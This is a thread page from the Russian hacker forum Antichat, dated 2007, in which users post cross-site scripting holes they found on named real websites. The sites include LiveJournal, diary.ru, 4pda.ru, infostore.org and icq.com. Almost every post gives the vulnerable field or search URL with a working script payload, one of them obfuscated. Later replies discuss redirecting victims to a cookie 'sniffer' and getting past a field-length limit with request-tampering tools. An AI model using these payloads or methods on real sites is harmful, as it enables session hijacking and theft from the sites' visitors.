HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #81  
Старый 03.09.2007, 15:15
XenOtai
Познающий
Регистрация: 30.12.2006
Сообщений: 32
С нами: 10190624

Репутация: 68
По умолчанию

Цитата:
http://diary.ru/options/diary/?mydiary
Уязвимо поле "Название дневника". Каждый, кто зайдёт на Ваш дневник, напорется на хсс.

Пример запроса в поле:

Цитата:
"><script>alert(document.cookie)</script>
 
Ответить с цитированием

  #82  
Старый 04.09.2007, 18:28
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
С нами: 10240166

Репутация: 2097
По умолчанию

Код:
http://musicscope.ru/content/led-zeppelin-%D1%81%D0%BD%D0%BE%D0%B2%D0%B0-%D0%B2%D0%BC%D0%B5%D1%81%D1%82%D0%B5%3F
Оставляем комментарий такого вида:
Код:
"><script>alert('xss')</script>
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием

  #83  
Старый 04.09.2007, 22:27
XenOtai
Познающий
Регистрация: 30.12.2006
Сообщений: 32
С нами: 10190624

Репутация: 68
По умолчанию

Цитата:
livejournal.com
Активная хсс в поле "штат вне США (провинция, территория)". Каждый, кто зайдёт в Ваш профиль, напорется на хсс.

Пример запроса:

Цитата:
<script>alert(document.cookie)</script>

Пример можно посмотреть здесь:

Цитата:
http://test-govno.livejournal.com/profile
PS. Не должны быть указаны страна и часовой пояс.

Последний раз редактировалось XenOtai; 04.09.2007 в 22:53..
 
Ответить с цитированием

  #84  
Старый 14.09.2007, 21:07
AdReNa1!Ne
Участник форума
Регистрация: 24.05.2007
Сообщений: 229
С нами: 9982466

Репутация: 309
По умолчанию

http://robotraff.com/userpanel/selltraff.php
Уязвимы все поля

Результат - http://robotraff.com/userpanel/stats.php?thread=136
 
Ответить с цитированием

  #85  
Старый 14.09.2007, 21:34
lsass.exe
Участник форума
Регистрация: 05.08.2007
Сообщений: 236
С нами: 9877346

Репутация: 457
По умолчанию

http://www.bolero.ru//index.php?level=5&stype=quick&topic=0&cur_topic=0& cur_fquery=%3Cscript%3Ealert%28%5C%27xss%5C%27%29% 3C%2Fscript%3E&sclass=all&cat=0&fquery=%22%3E%3Csc ript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&cat=0&x =0&y=0

http://4pda.ru/sr.php?query=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
 
Ответить с цитированием

  #86  
Старый 22.09.2007, 14:31
+StArT+
Познающий
Регистрация: 10.02.2007
Сообщений: 38
С нами: 10130311

Репутация: 183
По умолчанию

Активная XSS на infostore.org
На момент описания уязвимости, на infostore Администрацией были приняты меры, и включена привязка к IP адресу.
.................................................. .......................
Уязвимость существует из-за недостаточной фильтрации входных данных в поле "текст:"
при добавлении новости пользователем, и в личных сообщениях.
В поле "текст:" пишем следующие:
Код:
<img src="a"onError=javascript:alert('XSS');>
Также, еще была найдена пассивная XSS
Код:
<a href="javascript:String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,60,47,115,99,114,105,112,116,62)">XSS</a>
.................................................. .......................
______________________________________________
*****************************************
 
Ответить с цитированием

  #87  
Старый 25.09.2007, 13:37
F1anKeR
Новичок
Регистрация: 24.09.2007
Сообщений: 3
С нами: 9805311

Репутация: 0
По умолчанию

Цитата:
Сообщение от XenOtai  
Активная хсс в поле "штат вне США (провинция, территория)". Каждый, кто зайдёт в Ваш профиль, напорется на хсс.
длина поля maxlength="50" , не хватает, чтобы нормальный редирект на сниффер поставить
 
Ответить с цитированием

  #88  
Старый 25.09.2007, 13:47
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

Цитата:
Сообщение от F1anKeR  
длина поля maxlength="50" , не хватает, чтобы нормальный редирект на сниффер поставить
Это не сложно обойти с помощью снифера и конструктора запросов, типа naviscope и inetcrack или Data tamper для FF или банального исправления формы у себя на винте
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #89  
Старый 26.09.2007, 12:40
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию

icq.com

все прошлые прикрыли, но:
опять в блоге, и опять уязвимо поле "Image web address:"
"onmouseover="alert('xss')"
все символы не фильтруются и кол-во не ограниченно
 
Ответить с цитированием

  #90  
Старый 21.10.2007, 04:35
SSSetuPPP
Познающий
Регистрация: 22.01.2007
Сообщений: 32
С нами: 10158236

Репутация: 0
Question

Цитата:
Сообщение от freddi  
icq.com

все прошлые прикрыли, но:
опять в блоге, и опять уязвимо поле "Image web address:"
"onmouseover="alert('xss')"
все символы не фильтруются и кол-во не ограниченно
Где находится это поле "Image web address:"?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.